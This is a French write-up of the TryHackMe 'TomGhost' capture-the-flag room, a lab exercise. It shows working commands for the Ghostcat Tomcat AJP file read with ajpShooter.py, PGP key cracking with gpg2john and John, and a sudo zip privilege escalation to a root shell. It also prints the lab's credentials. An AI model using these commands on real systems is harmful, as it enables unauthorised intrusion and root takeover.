#TomGhost TryHackMe

Nous réalisons donc dans un premier temps un nmap avec la commande nmap -sV -sC $ip on remarque qu’il y un service Apache Tomcat sur le port 8080. En voyant la version on retrouve qu’il est possible d’exploiter une vulnérabilité appelée Ghostcat en fonction de la version de Tomcat.

https://apkash8.medium.com/hunting-and-exploiting-apache-ghostcat-b7446ef83e74

python3 ajpShooter.py http://10.10.54.51:8080/ 8009 /WEB-INF read

python3 [ajpShooter.py](http://ajpshooter.py/) http://10.10.54.51:8080/ 8009 /WEB-INF/web.xml read

On suit l’article et on récupère skyfuck:8730281lkjlkjdqlksalks

On réalise ainsi une connexion ssh et on récupère un accès shell.

On peut ainsi cat le fichier dans le dossier merlin et avoir le flag.

Dans notre répertoire nous avions deux fichiers dont une clé PGP et un fichier chiffré en PGP.

On va donc ouvrir un serveur python, python3 -m http.server puis wget http://$ip/$fichiers depuis notre machine. On va ainsi craquer la clé avec John.

gpg --import name.asc

gpg2john tryhackme.asc > hash

john --format=gpg --wordlist=/usr/share/wordlists/rockyou.txt hash

gpg --decrypt somecredentials.pgp

John nous ressors alors : alexandru

merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

en faisant sudo -l on remarque :

1
2

User merlin may run the following commands on ubuntu:
(root : root) NOPASSWD: /usr/bin/zip

Sur GTFObins, on remarque que nous pouvons lancer des commandes pour passer root si on à les droits roots sur le binaire zip.

1
2
3

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

Nous pouvons ainsi cat le fichier root.txt et flag ;)